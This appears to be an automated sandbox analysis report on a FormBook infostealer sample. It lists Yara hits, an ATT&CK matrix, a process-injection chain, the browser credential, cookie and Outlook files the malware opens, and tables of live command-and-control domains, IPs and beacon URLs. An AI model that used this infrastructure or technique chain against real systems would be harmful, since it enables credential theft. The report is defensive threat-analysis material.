Source: Yara match | File source: 4.2.suBpo1g13Q.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.suBpo1g13Q.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.3802960241.0000000000810000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1637335809.00000000013C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1636657887.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3813776931.00000000045F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3813875432.0000000004640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3813882427.00000000022E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1638525330.00000000017C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\waitfor.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\waitfor.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\waitfor.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\waitfor.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\waitfor.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\waitfor.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\waitfor.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\waitfor.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\waitfor.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality

Source: Yara match | File source: 4.2.suBpo1g13Q.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.suBpo1g13Q.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.3802960241.0000000000810000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1637335809.00000000013C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1636657887.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3813776931.00000000045F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3813875432.0000000004640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3813882427.00000000022E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1638525330.00000000017C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
MITRE ATT&CK Matrix (one column per tactic; a leading number is the signature count shown for that technique in this analysis)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 412 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 1 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 4 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 5 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 412 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 5 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 113 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 4 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 2 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Timestomp | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 1 DLL Side-Loading | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
Behavior Graph (ID: 1588629, Sample: suBpo1g13Q.exe, Startdate: 11/01/2025, Architecture: WINDOWS, Score: 100)

Start node: DNS/IP: www.optimismbank.xyz, www.jcsa.info, 13 other IPs or domains. Signatures: Suricata IDS alerts for network traffic; Multi AV Scanner detection for submitted file; Yara detected FormBook; 3 other signatures. Performs DNS queries to domains with low reputation (www.optimismbank.xyz). Starts suBpo1g13Q.exe.
suBpo1g13Q.exe (started): dropped C:\Users\user\AppData\...\suBpo1g13Q.exe.log (ASCII). Signature: Injects a PE file into a foreign processes. Starts two further suBpo1g13Q.exe processes.
suBpo1g13Q.exe (child): Signature: Maps a DLL or memory area into another process. Injects into iBkWOgpZKSoi.exe.
iBkWOgpZKSoi.exe (injected): Signature: Found direct / indirect Syscall (likely to bypass EDR). Starts waitfor.exe.
waitfor.exe (started): Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures. Injects into iBkWOgpZKSoi.exe; starts firefox.exe.
iBkWOgpZKSoi.exe (injected by waitfor.exe): DNS/IP: thaor56.online 202.92.5.23, ports 49981, 80 (VNPT-AS-VNVNPTCorpVN, Viet Nam); www.greenthub.life 209.74.77.109, ports 51532, 51533, 51534 (MULTIBAND-NEWHOPEUS, United States); 10 other IPs or domains. Signature: Found direct / indirect Syscall (likely to bypass EDR).

Antivirus, Machine Learning and Genetic Malware Detection

Source | Detection | Scanner | Label
suBpo1g13Q.exe | 39% | Virustotal |
suBpo1g13Q.exe | 68% | ReversingLabs | ByteCode-MSIL.Backdoor.FormBook
suBpo1g13Q.exe | 100% | Joe Sandbox ML |
No Antivirus matches
| Source | Detection | Scanner | Label |
|---|---|---|---|
| http://www.bankseedz.info/uf7y/ | 0% | Avira URL Cloud | safe |
| http://www.madhf.tech/3iym/ | 0% | Avira URL Cloud | safe |
| http://www.jcsa.info/hxi5/ | 0% | Avira URL Cloud | safe |
| http://www.bankseedz.info/uf7y/?P8dT=Gvw8Prk0H4&6n=X8Xx4Xb3zOwIp/YnRuUSDS9+m9M27HztmVzPPBr+rNKRcobOh5vjSVUUxnTRN3k+HcX7svN7WZWipHk078Y7goc5xtOfckJoEDkF4EtN7gOpTNuRUA== | 0% | Avira URL Cloud | safe |
| http://www.zkdamdjj.shop | 0% | Avira URL Cloud | safe |
| http://www.43kdd.top/p3j6/?6n=OVR2CF7p+NAClGW1MELAdr9D19OOCZyiV2x0cNqPuUjpn/Qhs1nMs1p1ZXuPw6NSEK+YKob7dwv93+8G93LPKWq9PBiy69Y2nadeDtRJ0gD55AbRoA==&P8dT=Gvw8Prk0H4 | 0% | Avira URL Cloud | safe |
| http://www.jcsa.info/University_of_Toronto.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImm0iO | 0% | Avira URL Cloud | safe |
| http://www.1secondlending.one/j8pv/?P8dT=Gvw8Prk0H4&6n=JIuj9wxSnK6mEyWHgqme9cDOp2JPGD2avn5HAjA8ht24L6v+vQ9uqWv6ig59Dwg+VmGSo2u3Iy71OFL1070b7jcEPeQmL51Me3DwZ/KAlDYaGirikg== | 0% | Avira URL Cloud | safe |
| http://www.Jcsa.info | 0% | Avira URL Cloud | safe |
| http://www.greenthub.life/r3zg/ | 0% | Avira URL Cloud | safe |
| http://www.optimismbank.xyz/98j3/?6n=jo1iJOnj8ueGZPJABf2g0H8HuOKbJgV1DdtSaCSQL5v3UEYBE5VATgrqgu9yCYXU1qT81UG2HbOLQLBbZNDoMbyhLLQuZT4Au5NQMQhm1oIOAMIGMg==&P8dT=Gvw8Prk0H4 | 0% | Avira URL Cloud | safe |
| http://www.jcsa.info/Business_Degrees.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImm0iOjPH20 | 0% | Avira URL Cloud | safe |
| http://www.laohub10.net/n2c9/ | 0% | Avira URL Cloud | safe |
| http://www.zkdamdjj.shop/swhs/?6n=8xf1FTtyUpYkrTYPPLWUAP++SxZR47Hqllrz0dKQmws7hy/+lCnqv8MjCvT/8dHN8wn+YkpcLfbwvxo0J0bTQ0BhNgyFEMOmWGxKSf7yVXLPttL2EQ==&P8dT=Gvw8Prk0H4 | 0% | Avira URL Cloud | safe |
| http://www.jcsa.info/Course_Descriptions.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImm0iOjP | 0% | Avira URL Cloud | safe |
| http://www.madhf.tech/3iym/?6n=hj5olkscFnqSpGab0vn3LNHrBnWaORens9/m32Sz6t4FBTGsttWpVpCBqSKeTRLk/faBYURW8ZeFt/JnnXLulZC8haYSThO7dC1CsRTUMY0QRbxSNQ==&P8dT=Gvw8Prk0H4 | 0% | Avira URL Cloud | safe |
| http://www.thaor56.online/fev0/?6n=ZsYTLU62Pg4Ji1Y7yKx0R+43dnCF/DoTsxMfn/Xy/YyeGOVtNzq5pky0tbrPVR8P9zBOlb50dZZ9z8YaOITKn/+Qn9LZj60FJTogwY+WbqWfqijUMg==&P8dT=Gvw8Prk0H4 | 0% | Avira URL Cloud | safe |
| http://www.register.com/?trkID=WSTm3u15CW | 0% | Avira URL Cloud | safe |
| http://www.optimismbank.xyz/98j3/ | 0% | Avira URL Cloud | safe |
| http://www.madhf.tech/3iym/?6n=hj5olkscFnqSpGab0vn3LNHrBnWaORens9/m32Sz6t4FBTGsttWpVpCBqSKeTRLk/faBY | 0% | Avira URL Cloud | safe |
| http://www.jcsa.info/display.cfm | 0% | Avira URL Cloud | safe |
| http://www.xcvbj.asia/hkgx/?6n=wgVoJ8uM9T0/Zez2re1RszMbFHmAlDimGOKD8PxxFFLfP5o8U05sZY6pknTlSn+/tcq1eo8k+yVAgRwnrxxUvSVPlvrZOPxTHwBspwPrhhwxEcqkEw==&P8dT=Gvw8Prk0H4 | 0% | Avira URL Cloud | safe |
| http://www.43kdd.top/p3j6/ | 0% | Avira URL Cloud | safe |
| http://www.laohub10.net/n2c9/?6n=3x/7f4nzUvf4Ssmpt1jlNGgCnZA9EhdoZs8QEOaGeCkTK2Ae1JBrg2/7Qirl6WfPBEFIuXRetS7qNq3tJgV/MvFKcHVyRNQ0lpxItwqxseE7Zdzalg==&P8dT=Gvw8Prk0H4 | 0% | Avira URL Cloud | safe |
| http://www.yc791022.asia/31pt/?6n=TMDpBYanOquY9Rx7lbKrlsthbxkcecghv73C9/MKdrwqjZcj4ORMyeLFBityLVio1oCUCVJYl2rwHayMePC/X0BgzzdODOQRhsaLMWye0XS2e8Pang==&P8dT=Gvw8Prk0H4 | 0% | Avira URL Cloud | safe |
| http://www.jcsa.info/__media__/js/trademark.php?d=jcsa.info&type=dflt | 0% | Avira URL Cloud | safe |
| http://www.yc791022.asia/31pt/ | 0% | Avira URL Cloud | safe |
| http://www.zkdamdjj.shop/swhs/ | 0% | Avira URL Cloud | safe |
| http://www.jcsa.info/Best_Online_University.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImm0i | 0% | Avira URL Cloud | safe |
| http://www.greenthub.life/r3zg/?P8dT=Gvw8Prk0H4&6n=du4jOMLkh7fLnmDuLYOIPa2Wp2ys3F+jaV3EKcXkS3D/yxi6pio40SibWtKrR6Fw1AeDGXhTcKeneAqCGOT06bVBzroOuQGNKcNgifQ36nJgHTvH4A== | 0% | Avira URL Cloud | safe |
| https://www.register.com/whois.rcmx?domainName=Jcsa.info | 0% | Avira URL Cloud | safe |
| http://www.register.com?trkID=WSTm3u15CW | 0% | Avira URL Cloud | safe |
| http://www.jcsa.info/hxi5/?6n=/xN+QifpSgLb8oJZvOcEecwEXTNjyqH/ixYmgFld7FWiq7hEgfqLv6xcCSKy7O4D9GLUZYEuvgkAAG4+HQzECON3mfxJeBtjbn7k9Vw2XGkLNgd8mA==&P8dT=Gvw8Prk0H4 | 0% | Avira URL Cloud | safe |
| http://www.xcvbj.asia/hkgx/ | 0% | Avira URL Cloud | safe |
| http://www.jcsa.info/Japanese_Language_School.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImm | 0% | Avira URL Cloud | safe |
| http://www.1secondlending.one/j8pv/ | 0% | Avira URL Cloud | safe |
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| www.bankseedz.info | 46.30.211.38 | true | false | | high |
| www.optimismbank.xyz | 13.248.169.48 | true | true | | unknown |
| www.madhf.tech | 103.224.182.242 | true | false | | high |
| s-part-0017.t-0009.t-msedge.net | 13.107.246.45 | true | false | | high |
| r0lqcud7.nbnnn.xyz | 23.225.159.42 | true | false | | high |
| www.xcvbj.asia | 149.88.81.190 | true | false | | high |
| 43kdd.top | 154.23.178.231 | true | false | | high |
| thaor56.online | 202.92.5.23 | true | true | | unknown |
| www.1secondlending.one | 43.205.198.29 | true | false | | high |
| www.zkdamdjj.shop | 188.114.97.3 | true | false | | high |
| www.jcsa.info | 208.91.197.39 | true | true | | unknown |
| www.yc791022.asia | 101.35.209.183 | true | false | | high |
| www.greenthub.life | 209.74.77.109 | true | true | | unknown |
| www.laohub10.net | unknown | unknown | false | | high |
| www.thaor56.online | unknown | unknown | false | | unknown |
| www.43kdd.top | unknown | unknown | false | | high |
| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| http://www.bankseedz.info/uf7y/ | true | Avira URL Cloud: safe | unknown |
| http://www.madhf.tech/3iym/ | true | Avira URL Cloud: safe | unknown |
| http://www.jcsa.info/hxi5/ | true | Avira URL Cloud: safe | unknown |
| http://www.43kdd.top/p3j6/?6n=OVR2CF7p+NAClGW1MELAdr9D19OOCZyiV2x0cNqPuUjpn/Qhs1nMs1p1ZXuPw6NSEK+YKob7dwv93+8G93LPKWq9PBiy69Y2nadeDtRJ0gD55AbRoA==&P8dT=Gvw8Prk0H4 | true | Avira URL Cloud: safe | unknown |
| http://www.greenthub.life/r3zg/ | true | Avira URL Cloud: safe | unknown |
| http://www.1secondlending.one/j8pv/?P8dT=Gvw8Prk0H4&6n=JIuj9wxSnK6mEyWHgqme9cDOp2JPGD2avn5HAjA8ht24L6v+vQ9uqWv6ig59Dwg+VmGSo2u3Iy71OFL1070b7jcEPeQmL51Me3DwZ/KAlDYaGirikg== | true | Avira URL Cloud: safe | unknown |
| http://www.bankseedz.info/uf7y/?P8dT=Gvw8Prk0H4&6n=X8Xx4Xb3zOwIp/YnRuUSDS9+m9M27HztmVzPPBr+rNKRcobOh5vjSVUUxnTRN3k+HcX7svN7WZWipHk078Y7goc5xtOfckJoEDkF4EtN7gOpTNuRUA== | true | Avira URL Cloud: safe | unknown |
| http://www.optimismbank.xyz/98j3/?6n=jo1iJOnj8ueGZPJABf2g0H8HuOKbJgV1DdtSaCSQL5v3UEYBE5VATgrqgu9yCYXU1qT81UG2HbOLQLBbZNDoMbyhLLQuZT4Au5NQMQhm1oIOAMIGMg==&P8dT=Gvw8Prk0H4 | true | Avira URL Cloud: safe | unknown |
| http://www.laohub10.net/n2c9/ | true | Avira URL Cloud: safe | unknown |
| http://www.zkdamdjj.shop/swhs/?6n=8xf1FTtyUpYkrTYPPLWUAP++SxZR47Hqllrz0dKQmws7hy/+lCnqv8MjCvT/8dHN8wn+YkpcLfbwvxo0J0bTQ0BhNgyFEMOmWGxKSf7yVXLPttL2EQ==&P8dT=Gvw8Prk0H4 | true | Avira URL Cloud: safe | unknown |
| http://www.madhf.tech/3iym/?6n=hj5olkscFnqSpGab0vn3LNHrBnWaORens9/m32Sz6t4FBTGsttWpVpCBqSKeTRLk/faBYURW8ZeFt/JnnXLulZC8haYSThO7dC1CsRTUMY0QRbxSNQ==&P8dT=Gvw8Prk0H4 | true | Avira URL Cloud: safe | unknown |
| http://www.thaor56.online/fev0/?6n=ZsYTLU62Pg4Ji1Y7yKx0R+43dnCF/DoTsxMfn/Xy/YyeGOVtNzq5pky0tbrPVR8P9zBOlb50dZZ9z8YaOITKn/+Qn9LZj60FJTogwY+WbqWfqijUMg==&P8dT=Gvw8Prk0H4 | true | Avira URL Cloud: safe | unknown |
| http://www.optimismbank.xyz/98j3/ | true | Avira URL Cloud: safe | unknown |
| http://www.xcvbj.asia/hkgx/?6n=wgVoJ8uM9T0/Zez2re1RszMbFHmAlDimGOKD8PxxFFLfP5o8U05sZY6pknTlSn+/tcq1eo8k+yVAgRwnrxxUvSVPlvrZOPxTHwBspwPrhhwxEcqkEw==&P8dT=Gvw8Prk0H4 | true | Avira URL Cloud: safe | unknown |
| http://www.yc791022.asia/31pt/?6n=TMDpBYanOquY9Rx7lbKrlsthbxkcecghv73C9/MKdrwqjZcj4ORMyeLFBityLVio1oCUCVJYl2rwHayMePC/X0BgzzdODOQRhsaLMWye0XS2e8Pang==&P8dT=Gvw8Prk0H4 | true | Avira URL Cloud: safe | unknown |
| http://www.43kdd.top/p3j6/ | true | Avira URL Cloud: safe | unknown |
| http://www.laohub10.net/n2c9/?6n=3x/7f4nzUvf4Ssmpt1jlNGgCnZA9EhdoZs8QEOaGeCkTK2Ae1JBrg2/7Qirl6WfPBEFIuXRetS7qNq3tJgV/MvFKcHVyRNQ0lpxItwqxseE7Zdzalg==&P8dT=Gvw8Prk0H4 | true | Avira URL Cloud: safe | unknown |
| http://www.yc791022.asia/31pt/ | true | Avira URL Cloud: safe | unknown |
| http://www.zkdamdjj.shop/swhs/ | true | Avira URL Cloud: safe | unknown |
| http://www.jcsa.info/hxi5/?6n=/xN+QifpSgLb8oJZvOcEecwEXTNjyqH/ixYmgFld7FWiq7hEgfqLv6xcCSKy7O4D9GLUZYEuvgkAAG4+HQzECON3mfxJeBtjbn7k9Vw2XGkLNgd8mA==&P8dT=Gvw8Prk0H4 | true | Avira URL Cloud: safe | unknown |
| http://www.xcvbj.asia/hkgx/ | true | Avira URL Cloud: safe | unknown |
| http://www.greenthub.life/r3zg/?P8dT=Gvw8Prk0H4&6n=du4jOMLkh7fLnmDuLYOIPa2Wp2ys3F+jaV3EKcXkS3D/yxi6pio40SibWtKrR6Fw1AeDGXhTcKeneAqCGOT06bVBzroOuQGNKcNgifQ36nJgHTvH4A== | true | Avira URL Cloud: safe | unknown |
| http://www.1secondlending.one/j8pv/ | true | Avira URL Cloud: safe | unknown |
| Name | Source | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|
| https://duckduckgo.com/chrome_newtab | waitfor.exe, 00000007.00000002.3818235867.0000000007B18000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| https://dts.gnpge.com | iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmp | false | | high |
| https://duckduckgo.com/ac/?q= | waitfor.exe, 00000007.00000002.3818235867.0000000007B18000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| http://www.zkdamdjj.shop | iBkWOgpZKSoi.exe, 00000008.00000002.3816364731.0000000004E43000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot | waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmp | false | | high |
| https://cdn.consentmanager.net | waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmp | false | | high |
| http://www.jcsa.info/University_of_Toronto.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImm0iO | waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf | waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmp | false | | high |
| https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | waitfor.exe, 00000007.00000002.3818235867.0000000007B18000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| http://www.Jcsa.info | waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://i4.cdn-image.com/__media__/pics/29590/bg1.png) | waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmp | false | | high |
| http://i4.cdn-image.com/__media__/pics/8934/rcomlogo.jpg | waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmp | false | | high |
| http://www.jcsa.info/Business_Degrees.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImm0iOjPH20 | waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf | waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmp | false | | high |
| https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | waitfor.exe, 00000007.00000002.3818235867.0000000007B18000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| http://www.jcsa.info/Course_Descriptions.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImm0iOjP | waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2 | waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmp | false | | high |
| http://i4.cdn-image.com/__media__/pics/28903/search.png) | waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmp | false | | high |
| http://i4.cdn-image.com/__media__/pics/28905/arrrow.png) | waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmp | false | | high |
| https://delivery.consentmanager.net | waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmp | false | | high |
| http://www.register.com/?trkID=WSTm3u15CW | waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix | waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmp | false | | high |
| http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot | waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmp | false | | high |
| http://www.jcsa.info/display.cfm | waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://www.madhf.tech/3iym/?6n=hj5olkscFnqSpGab0vn3LNHrBnWaORens9/m32Sz6t4FBTGsttWpVpCBqSKeTRLk/faBY | iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.000000000354E000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | waitfor.exe, 00000007.00000002.3818235867.0000000007B18000.00000004.00000020.00020000.00000000.sdmp | false | | high |
